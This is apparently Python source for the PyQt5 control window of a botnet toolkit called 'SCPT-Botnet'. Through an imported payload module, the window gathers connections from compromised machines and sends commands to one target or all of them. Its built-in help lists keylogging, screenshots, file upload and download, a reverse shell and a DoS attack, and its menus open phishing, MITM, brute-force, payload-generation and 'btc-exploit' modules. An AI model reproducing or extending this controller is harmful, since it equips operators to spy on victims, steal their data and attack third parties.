# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'scpt_gui_botnet.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


from PyQt5 import QtCore, QtGui, QtWidgets
from payload import lick
import sys
class Ui_MainWindow_botnet(object):
    target_id=""
    def setupUi(self, MainWindow_bot):
        MainWindow_bot.setObjectName("MainWindow_bot")
        MainWindow_bot.resize(1367, 597)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap("scpt.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        MainWindow_bot.setWindowIcon(icon)
        self.centralwidget = QtWidgets.QWidget(MainWindow_bot)
        self.centralwidget.setObjectName("centralwidget")
        self.frame = QtWidgets.QFrame(self.centralwidget)
        self.frame.setGeometry(QtCore.QRect(0, 0, 781, 541))
        self.frame.setStyleSheet("background-color: rgb(170, 0, 127);")
        self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.label = QtWidgets.QLabel(self.frame)
        self.label.setGeometry(QtCore.QRect(10, 130, 58, 18))
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(self.frame)
        self.label_2.setGeometry(QtCore.QRect(10, 460, 71, 18))
        self.label_2.setObjectName("label_2")
        self.textEdit = QtWidgets.QTextEdit(self.frame)
        self.textEdit.setGeometry(QtCore.QRect(60, 90, 701, 331))
        self.textEdit.setStyleSheet("background-color: rgb(0, 85, 0);")
        self.textEdit.setObjectName("textEdit")
        self.lineEdit = QtWidgets.QLineEdit(self.frame)
        self.lineEdit.setGeometry(QtCore.QRect(80, 440, 421, 51))
        self.lineEdit.setStyleSheet("background-color: rgb(0, 85, 127);")
        self.lineEdit.setObjectName("lineEdit")
        self.pushButton = QtWidgets.QPushButton(self.frame)
        self.pushButton.setGeometry(QtCore.QRect(520, 440, 131, 51))
        self.pushButton.setStyleSheet("background-color: rgb(0, 0, 255);")
        self.pushButton.setObjectName("pushButton")
        self.label_3 = QtWidgets.QLabel(self.frame)
        self.label_3.setGeometry(QtCore.QRect(10, 50, 101, 18))
        self.label_3.setObjectName("label_3")
        self.comboBox = QtWidgets.QComboBox(self.frame)
        self.comboBox.setGeometry(QtCore.QRect(140, 30, 161, 51))
        self.comboBox.setStyleSheet("background-color: rgb(0, 0, 127);")
        self.comboBox.setObjectName("comboBox")
        self.comboBox.addItem("")
        self.frame_2 = QtWidgets.QFrame(self.centralwidget)
        self.frame_2.setGeometry(QtCore.QRect(810, 0, 551, 541))
        self.frame_2.setStyleSheet("background-color: rgb(0, 85, 127);")
        self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_2.setObjectName("frame_2")
        self.label_4 = QtWidgets.QLabel(self.frame_2)
        self.label_4.setGeometry(QtCore.QRect(10, 250, 41, 18))
        self.label_4.setObjectName("label_4")
        self.textEdit_2 = QtWidgets.QTextEdit(self.frame_2)
        self.textEdit_2.setGeometry(QtCore.QRect(50, 20, 451, 401))
        self.textEdit_2.setStyleSheet("background-color: rgb(103, 103, 103);")
        self.textEdit_2.setObjectName("textEdit_2")
        self.textEdit_2.setText("commands:\nclear \t ->> to clear the output_screen\nenum \t ->>to enumrate\nscreenshoot \t ->>>> take screen shot\nstkeylog \t ->>> start keyloger\nspkeylog \t ->>> stop keyloger\nupload filename -t   ->> upload file\ndownload filename \t ->> download file\nshell \t ->> start normal reverse shell work in one target only\ndos target_ip stopTime \t ->> dos attack ip")

        self.labelip = QtWidgets.QLabel(self.frame_2)
        self.labelip.setGeometry(QtCore.QRect(90, 450, 120, 50))
        self.labelip.setObjectName("labelip")
        self.labelip.setText("ip")
        self.lineEdit2 = QtWidgets.QLineEdit(self.frame_2)
        self.lineEdit2.setGeometry(QtCore.QRect(120, 450, 120, 50))
        self.lineEdit2.setStyleSheet("background-color: rgb(170, 0, 127);")
        self.lineEdit2.setObjectName("lineEdit2")

        self.labelport = QtWidgets.QLabel(self.frame_2)
        self.labelport.setGeometry(QtCore.QRect(250, 450, 120, 50))
        self.labelport.setObjectName("labelport")
        self.labelport.setText("port")
        self.lineEdit3 = QtWidgets.QLineEdit(self.frame_2)
        self.lineEdit3.setGeometry(QtCore.QRect(290, 450, 120, 50))
        self.lineEdit3.setStyleSheet("background-color: rgb(170, 0, 127);")
        self.lineEdit3.setObjectName("lineEdit3")

        self.pushButton2 = QtWidgets.QPushButton(self.frame_2)
        self.pushButton2.setGeometry(QtCore.QRect(390, 500, 120, 50))
        self.pushButton2.setStyleSheet("background-color: rgb(170, 0, 0);")
        self.pushButton2.setObjectName("pushButton2")

        MainWindow_bot.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow_bot)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 1367, 30))
        self.menubar.setObjectName("menubar")
        self.menuwindows = QtWidgets.QMenu(self.menubar)
        self.menuwindows.setObjectName("menuwindows")
        self.menupayload = QtWidgets.QMenu(self.menuwindows)
        self.menupayload.setObjectName("menupayload")
        self.menuHelp = QtWidgets.QMenu(self.menubar)
        self.menuHelp.setObjectName("menuHelp")
        MainWindow_bot.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow_bot)
        self.statusbar.setObjectName("statusbar")
        MainWindow_bot.setStatusBar(self.statusbar)
        self.actionabout = QtWidgets.QAction(MainWindow_bot)
        self.actionabout.setObjectName("actionabout")
        self.actionWEB = QtWidgets.QAction(MainWindow_bot)
        self.actionWEB.setObjectName("actionWEB")
        self.actionMITM = QtWidgets.QAction(MainWindow_bot)
        self.actionMITM.setObjectName("actionMITM")
        self.actioncryptography = QtWidgets.QAction(MainWindow_bot)
        self.actioncryptography.setObjectName("actioncryptography")
        self.actionBrute_force = QtWidgets.QAction(MainWindow_bot)
        self.actionBrute_force.setObjectName("actionBrute_force")
        self.actiongenerate_payload = QtWidgets.QAction(MainWindow_bot)
        self.actiongenerate_payload.setObjectName("actiongenerate_payload")
        self.actionreverseShell = QtWidgets.QAction(MainWindow_bot)
        self.actionreverseShell.setObjectName("actionreverseShell")
        self.actionPhishing = QtWidgets.QAction(MainWindow_bot)
        self.actionPhishing.setObjectName("actionPhishing")
        self.actionbtc_exploit = QtWidgets.QAction(MainWindow_bot)
        self.actionbtc_exploit.setObjectName("actionbtc_exploit")
        self.actiongoogle_drok = QtWidgets.QAction(MainWindow_bot)
        self.actiongoogle_drok.setObjectName("actiongoogle_drok")
        self.actionport_scan = QtWidgets.QAction(MainWindow_bot)
        self.actionport_scan.setObjectName("actionport_scan")
        self.actionVulnerability_scan = QtWidgets.QAction(MainWindow_bot)
        self.actionVulnerability_scan.setObjectName("actionVulnerability_scan")
        self.menupayload.addAction(self.actiongenerate_payload)
        self.menupayload.addAction(self.actionreverseShell)
        self.menuwindows.addAction(self.actionWEB)
        self.menuwindows.addAction(self.actionMITM)
        self.menuwindows.addAction(self.actioncryptography)
        self.menuwindows.addAction(self.menupayload.menuAction())
        self.menuwindows.addAction(self.actionBrute_force)
        self.menuwindows.addAction(self.actionPhishing)
        self.menuwindows.addAction(self.actionbtc_exploit)
        self.menuwindows.addAction(self.actiongoogle_drok)
        self.menuwindows.addAction(self.actionport_scan)
        self.menuwindows.addAction(self.actionVulnerability_scan)
        self.menuHelp.addAction(self.actionabout)
        self.menubar.addAction(self.menuwindows.menuAction())
        self.menubar.addAction(self.menuHelp.menuAction())

        self.retranslateUi(MainWindow_bot)
        QtCore.QMetaObject.connectSlotsByName(MainWindow_bot)

    def aboutss(self):
        from scpt_GUI_about import Ui_MainWindow_about
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_about()
        self.ui.setupUi(self.Form)
        # MainWindow_bot.close()
        self.Form.show()

    def websss(self,MainWindow_bot):
        from scpt_GUI_Web_scan import Ui_MainWindow_WS
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_WS()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def mitmsss(self,MainWindow_bot):
        from scpt_GUI_MITM import Ui_MainWindow_Mitm
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_Mitm()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def crptosss(self,MainWindow_bot):
        from scpt_GUI_cryptography import Ui_MainWindow_crypto
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_crypto()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def Payload_G(self,MainWindow_bot):
        from scpt_GUI_generate_payload import Ui_MainWindow_GP
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_GP()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def Payload_Rev(self,MainWindow_bot):
        from scpt_GUI_Reverse_shell import Ui_MainWindow_RS
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_RS()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close() 
        # MainWindow_bot.close()
        self.Form.show()



    def Brutessss(self,MainWindow_bot):
        from scpt_GUI_brute_force import Ui_MainWindow_brute
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_brute()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def Phisssss(self,MainWindow_bot):
        from scpt_GUI_Phishing import Ui_MainWindow_Ph
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_Ph()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def BTC_esss(self,MainWindow_bot):
        from scpt_GUI_btc_exploit import Ui_MainWindow_btc
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_btc()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def Googlesss(self,MainWindow_bot):
        from scpt_GUI_Google_Dork import Ui_MainWindow_GD
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_GD()
        self.ui.setupUi(self.Form)
        self.MainWindow.close()
        self.Form.show()

    def Port_scansss(self,MainWindow_bot):
        from scpt_GUI_Port_scan import Ui_MainWindow_PS
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_PS()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def vunlssss(self,MainWindow_bot):
        from scpt_GUI_vulnerability_search import Ui_MainWindow_VS
        # code the 2nd screen here
        self.Form = QtWidgets.QMainWindow()
        self.ui = Ui_MainWindow_VS()
        self.ui.setupUi(self.Form)
        MainWindow_bot.close()
        self.Form.show()

    def getconnections(self):
        host = str(self.lineEdit2.text())
        port = int(self.lineEdit3.text())
        self.rv = lick.revab(host, port)
        self.rv.getconnections()
        self.rv.allin()
        address = self.rv.allAddress
        c = 1
        for i in address:
            self.comboBox.addItems([i[0]+ ":" + str(i[1])])
            c += 1

    def choice(self, index):
        self.target_id = self.comboBox.currentText()
    def botG(self):
        comand = str(self.lineEdit.text())
        if(comand=="clear"):
            self.textEdit.clear()
        elif(self.target_id=="All"):
            print(self.target_id)
            for i in self.rv.allAddress:
                self.rv.GUI_accept_con2(self.rv.allAddress.index(i))
                self.textEdit.append(str("target"+i[0]+":"+str(i[1])+"\n"+self.rv.GUI_communication(comand)))
        else:
            print(self.target_id)
            tip = self.target_id[0:self.target_id.find(':')]
            tport = self.target_id[self.target_id.find(':'):].replace(":", "")
            self.targ = (tip, int(tport))
            self.rv.GUI_accept_con2(self.rv.allAddress.index(self.targ))
            self.textEdit.append(str(("target"+self.targ[0]+":"+str(self.targ[1])+"\n"+self.rv.GUI_communication(comand))))
    def retranslateUi(self, MainWindow_bot):
        _translate = QtCore.QCoreApplication.translate
        MainWindow_bot.setWindowTitle(_translate("MainWindow_bot", "SCPT-Botnet"))
        self.label.setText(_translate("MainWindow_bot", "output:"))
        self.label_2.setText(_translate("MainWindow_bot", "command:"))
        self.pushButton.setText(_translate("MainWindow_bot", "send"))
        self.pushButton.clicked.connect(self.botG)
        self.pushButton2.setText(_translate("MainWindow", "getconnections"))
        self.pushButton2.clicked.connect(self.getconnections)
        self.label_3.setText(_translate("MainWindow_bot", "Target_connect:"))
        self.comboBox.setItemText(0, _translate("MainWindow_bot", "All"))
        self.comboBox.view().pressed.connect(self.choice)
        self.label_4.setText(_translate("MainWindow_bot", "Help:"))
        self.menuwindows.setTitle(_translate("MainWindow_bot", "windows"))
        self.menupayload.setTitle(_translate("MainWindow_bot", "payload"))
        self.menuHelp.setTitle(_translate("MainWindow_bot", "Help"))
        self.actionabout.setText(_translate("MainWindow_bot", "about"))
        self.actionWEB.setText(_translate("MainWindow_bot", "WEB"))
        self.actionMITM.setText(_translate("MainWindow_bot", "MITM"))
        self.actioncryptography.setText(_translate("MainWindow_bot", "cryptography"))
        self.actionBrute_force.setText(_translate("MainWindow_bot", "Brute-force"))
        self.actiongenerate_payload.setText(_translate("MainWindow_bot", "generate-payload"))
        self.actionreverseShell.setText(_translate("MainWindow_bot", "reverseShell"))
        self.actionPhishing.setText(_translate("MainWindow_bot", "Phishing"))
        self.actionbtc_exploit.setText(_translate("MainWindow_bot", "btc-exploit"))
        self.actiongoogle_drok.setText(_translate("MainWindow_bot", "google-drok"))
        self.actionport_scan.setText(_translate("MainWindow_bot", "port-scan"))
        self.actionVulnerability_scan.setText(_translate("MainWindow_bot", "Vulnerability-scan"))

        self.actionWEB.triggered.connect(lambda:self.websss(MainWindow_bot))
        self.actionMITM.triggered.connect(lambda:self.mitmsss(MainWindow_bot))
        self.actioncryptography.triggered.connect(lambda:self.crptosss(MainWindow_bot))
        self.actionBrute_force.triggered.connect(lambda:self.Brutessss(MainWindow_bot))
        self.actionPhishing.triggered.connect(lambda:self.Phisssss(MainWindow_bot))
        self.actiongenerate_payload.triggered.connect(lambda:self.Payload_G(MainWindow_bot))
        self.actionreverseShell.triggered.connect(lambda:self.Payload_Rev(MainWindow_bot))
        self.actionbtc_exploit.triggered.connect(lambda:self.BTC_esss(MainWindow_bot))
        self.actiongoogle_drok.triggered.connect(lambda:self.Googlesss(MainWindow_bot))
        self.actionport_scan.triggered.connect(lambda:self.Port_scansss(MainWindow_bot))
        self.actionVulnerability_scan.triggered.connect(lambda:self.vunlssss(MainWindow_bot))
        self.actionabout.triggered.connect(self.aboutss)
    # def main(self):
    #     import sys
    #     app = QtWidgets.QApplication(sys.argv)
    #     MainWindow_bot = QtWidgets.QMainWindow()
    #     ui = Ui_MainWindow_botnet()
    #     ui.setupUi(MainWindow_bot)
    #     MainWindow_bot.show()
    #     sys.exit(app.exec_())

if __name__ == "__main__":
    # self.main()
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow_bot = QtWidgets.QMainWindow()
    ui = Ui_MainWindow_botnet()
    ui.setupUi(MainWindow_bot)
    MainWindow_bot.show()
    sys.exit(app.exec_())
